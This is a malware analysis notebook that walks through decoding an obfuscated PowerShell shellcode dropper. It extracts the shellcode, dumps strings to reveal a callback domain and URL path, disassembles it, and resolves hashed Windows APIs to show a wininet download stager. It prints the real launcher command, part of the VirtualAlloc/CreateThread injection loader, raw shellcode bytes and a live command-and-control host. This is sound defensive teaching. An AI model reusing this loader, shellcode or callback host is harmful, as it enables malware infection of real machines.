# Malware analysis notebook for shellcode payload by @JohnLaTwC

This notebook shows some examples on how to analyze shellcode.

The sample we will study has sha256 hash 0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f

You can find it on VirusTotal here:
https://www.virustotal.com/#/file/0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f/detection

Also uploaded here (MALWARE!):
https://gist.github.com/JohnLaTwC/2d2ac2a649deec5ac9d833285130cd21#file-0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f

Thanks to David Ledbetter (@ledtech3) for pointing it out to me!

To get started run the cell below, then click through each cell running them in order.

In [1]:
## let's fetch the malware
def fetch_payload(url):
    import requests

    r = requests.get(url)
    return r.content.decode()

url = 'https://gist.githubusercontent.com/JohnLaTwC/2d2ac2a649deec5ac9d833285130cd21/raw/2e961db21a845c1fb108e29eea3ce484cea1faa8/0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f'
malware_str = fetch_payload(url)
print (f"Fetched {len(malware_str)} bytes")

Fetched 8199 bytes


In [2]:
len_snippet = 150
print(f'printing the first {len_snippet} bytes of the PowerShell command:\n{malware_str[0:len_snippet]}...' )

printing the first 150 bytes of the PowerShell command:
powershell -w 1 -C "sv BY -;sv bK ec;sv Kq ((gv BY).value.toString()+(gv bK).value.toString());powershell (gv Kq).value.toString() 'JABkAEcASwAgAD0AIA...


In [3]:
# example extracting the b64 literal string using a regex and then extract just the shellcode itself

import re
import base64

def search_for_b64_string(malware_str):
    match_obj = re.search(r"([A-Za-z0-9=]{40,})", malware_str)
    
    b64blob = ''
    if match_obj is not None:
        b64blob = match_obj.group(1)
    return b64blob

def search_for_hex_shellcode(str_text):
    ## get the shellcode bytes. e.g. 0xfc,0xe8,0x82,0x00,0x00,....
    match_obj = re.search(r"(0x[a-z0-9]{2}[,;]){2,}", str_text)
    shellcode_hexstr = ''
    if match_obj is not None:
        shellcode_hexstr = match_obj.group(0)
        shellcode_hexstr = shellcode_hexstr.replace(';','') # remove any final semi-colon

    return shellcode_hexstr
        
b64blob = search_for_b64_string(malware_str)
print(f"Length of Base64 string is {len(b64blob)} bytes")

ps_script = base64.b64decode(b64blob).decode("utf-16", "strict")
len_snippet = 700
print(f'\nPrinting the first {len_snippet} bytes of the decoded payload:\n{ps_script[0:len_snippet]}...' )

shellcode_hexstr = search_for_hex_shellcode(ps_script)
print(f"\nShellcode bytes:")
shellcode_hexstr

Length of Base64 string is 8064 bytes

Printing the first 700 bytes of the decoded payload:
$dGK = '$Zm = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$kr = Add-Type -memberDefinition $Zm -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$krB = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,...

Shellcode bytes:


'0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x03,0x53,0x53,0x68,0x7e,0xf9,0x00,0x00,0xe8,0xb0,0x00,0x00,0x00,0x2f,0x67,0x53,0x4d,0x37,0x34,0x54,0x51,0x53,0x41,0x30,0x75,0x51,0x7a,0x70

## Analyzing shellcode
We have some x86 shellcode now. The only reason shellcode is used by this malware is to obfuscate what it's doing. I will show some techniques to demsytify what is going on.

### Technique #1: dump strings from it
Often times shellcode will connect back to a domain or URL and download a payload. Extracting these command and control 
network indicators can be sometimes as simple as viewing the shellcode as ASCII. If something simple works, use it.

In [4]:
## dump all strings from a buffer

def extract_strings(hex_str, min_length = 5):
    import string 

    shellcode_bytes = bytes.fromhex(''.join(hex_str.replace ('0x','').split(',')))

    shellcode_str = ''.join(list(map(lambda c: chr(c) if chr(c) in string.printable else '\t', shellcode_bytes)))
    match_obj = re.findall(r"([\w\.\-\/\_]{%d,})" % min_length, shellcode_str)
    for match in match_obj:
        print(match)
    
extract_strings(shellcode_hexstr)

hwiniThLw
SSSSSh
/gSM74TQSA0uQzpHPyzb8pA3p-2Ym3
SSSWSVh
SSSSVh-
epelix-63870.portmap.io


Right away we see the string `epelix-63870.portmap.io`. This is the callback domain. We also see the string `/gSM74TQSA0uQzpHPyzb8pA3p-2Ym3`. This is part of the Url it uses.  With no knowledge of assembly, we 
already have a network indicator to go hunt down!

### Technique #2: disassemble the shellcode
You can run the payload in a sandbox and get network behavior out of it. In this notebook we are going to focus on what 
can be learned by analyzing the assembly.

I used the (great) tool CyberChef (https://gchq.github.io/CyberChef/) to disassemble the shellcode.

In [5]:
url = 'https://raw.githubusercontent.com/JohnLaTwC/Shared/master/notebooks/0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f.CyberChefOutput.txt'
shellcode_str = fetch_payload(url)
print(shellcode_str)

00000000 FC                              CLD
00000001 E882000000                      CALL -FFFFFF78
00000006 60                              PUSHA
00000007 89E5                            MOV EBP,ESP
00000009 31C0                            XOR EAX,EAX
0000000B 648B5030                        MOV EDX,DWORD PTR FS:[EAX+30]
0000000F 8B520C                          MOV EDX,DWORD PTR [EDX+0C]
00000012 8B5214                          MOV EDX,DWORD PTR [EDX+14]
00000015 8B7228                          MOV ESI,DWORD PTR [EDX+28]
00000018 0FB74A26                        MOVZX ECX,WORD PTR [EDX+26]
0000001C 31FF                            XOR EDI,EDI
0000001E AC                              LODS AL,BYTE PTR [ESI]
0000001F 3C61                            CMP AL,61
00000021 7C02                            JL 00000025
00000023 2C20                            SUB AL,20
00000025 C1CF0D                          ROR EDI,0D
00000028 01C7                            ADD EDI,EAX
0000002A

This shellcode calls various Windows APIs. How do we find out which ones to understand more of the functionality?

Let's look at the shellcode at this offset. We see a series of `PUSH` instructions. what do they mean?

```
00000089 6833320000                      PUSH 00003233
0000008E 687773325F                      PUSH 5F327377
00000093 54                              PUSH ESP
00000094 684C772607                      PUSH 0726774C
```

In [6]:
# First let's  resolve the APIs in the shellcode

import re
import os
import tempfile
import sqlite3

APIDict = {}
fDbLoaded = False

def prepareAPIs():
    global APIDict
    global fDbLoaded
    szDbPath = None

    if szDbPath is None:
        szDbPath = os.path.join(tempfile.gettempdir(),'apihashes.db')
        if not os.path.isfile(szDbPath):
            url = 'https://github.com/JohnLaTwC/PyPowerShellXray/blob/master/apihashes.db?raw=true'
            import urllib.request
            urllib.request.urlretrieve(url, szDbPath)

    ## if APIs are being loaded from a DB, then do that now
    if (szDbPath is not None and not fDbLoaded):
        db = sqlite3.connect(szDbPath)
        cursor = db.cursor()
        cursor.execute('''SELECT module, api, hashvalue FROM APIs''')
        all_rows = cursor.fetchall()
        for row in all_rows:
            szHash = row[2]
            szDll = row[0]
            szAPI = row[1]
            APIDict[szHash] =  szDll + "!" + szAPI
        db.close()
        fDbLoaded = True

def resolve_block_hashes(str_shellcode):
    if not fDbLoaded:
        prepareAPIs()
    modsz = str_shellcode
    for dw in re.findall('PUSH ([A-Fa-f0-9]{8})', str_shellcode):
        try:
            modsz = re.sub('PUSH '+ dw, APIDict['0x' + dw.lower()], modsz)
        except KeyError:
            pass
    return modsz

updated_shellcode = resolve_block_hashes(shellcode_str)
print(updated_shellcode)

00000000 FC                              CLD
00000001 E882000000                      CALL -FFFFFF78
00000006 60                              PUSHA
00000007 89E5                            MOV EBP,ESP
00000009 31C0                            XOR EAX,EAX
0000000B 648B5030                        MOV EDX,DWORD PTR FS:[EAX+30]
0000000F 8B520C                          MOV EDX,DWORD PTR [EDX+0C]
00000012 8B5214                          MOV EDX,DWORD PTR [EDX+14]
00000015 8B7228                          MOV ESI,DWORD PTR [EDX+28]
00000018 0FB74A26                        MOVZX ECX,WORD PTR [EDX+26]
0000001C 31FF                            XOR EDI,EDI
0000001E AC                              LODS AL,BYTE PTR [ESI]
0000001F 3C61                            CMP AL,61
00000021 7C02                            JL 00000025
00000023 2C20                            SUB AL,20
00000025 C1CF0D                          ROR EDI,0D
00000028 01C7                            ADD EDI,EAX
0000002A

Now if we look at that offset we see what API it is calling:
    
```
00000089 686E657400                      PUSH 0074656E
0000008E 6877696E69                      PUSH 696E6977
00000093 54                              PUSH ESP
00000094 684C772607                      kernel32.dll!LoadLibraryA
```

#### Creating strings in memory by `PUSH` instructions

The shellcode below is going to call the `LoadLibrary` API(https://docs.microsoft.com/en-us/windows/desktop/api/libloaderapi/nf-libloaderapi-loadlibrarya). If you look at the API documentation, you 
see that it takes a string parameter (lpLibFileName)
```
HMODULE LoadLibraryA(
  LPCSTR lpLibFileName
);

```

The sequence below wants to pass WinInet.dll as the LibFileName. The NULL terminated string "wininet" conveniently
fits into 8 bytes 'wininet\0', so it breaks it up into two DWORDs and pushes each one on to the stack. If you look
at the values in the immediate value in the `PUSH` you will see ASCII values for "wininet\0". Since the `ESP` 
(stack pointer) register is pointing to the address from the last `PUSH`, it contains the memory location on the
stack for that string. The `PUSH ESP` puts the address of wininet on the stack so it can be passed as the 
lpLibFileName parameter to LoadLibrary:

```
00000089 686e657400       PUSH 0074656E--> 'ten'
0000008e 6877696e69       PUSH 696E6977--> 'iniw'
00000093 54               PUSH ESP
```

Now we see it is calling `LoadLibrary` on `wininet.dll` to call additional functions in it. 

Let's see the whole list of APIs we resolved:

In [7]:
def extract_annotations_from_output(output):
    return list(filter(lambda x: x if '!' in x else None, output))

extract_annotations_from_output(updated_shellcode.split('\r\n'))

['00000094 684C772607                      kernel32.dll!LoadLibraryA',
 '000000A2 683A5679A7                      wininet.dll!InternetOpenA',
 '000000D9 6857899FC6                      wininet.dll!InternetConnectA',
 '000000EE 68EB552E3B                      wininet.dll!HttpOpenRequestA',
 '00000106 6875469E86                      wininet.dll!InternetSetOptionA',
 '00000112 682D06187B                      wininet.dll!HttpSendRequestA',
 '00000122 6844F035E0                      kernel32.dll!Sleep',
 '0000012C 68F0B5A256                      kernel32.dll!ExitProcess',
 '00000140 6858A453E5                      kernel32.dll!VirtualAlloc',
 '00000154 68129689E2                      wininet.dll!InternetReadFile']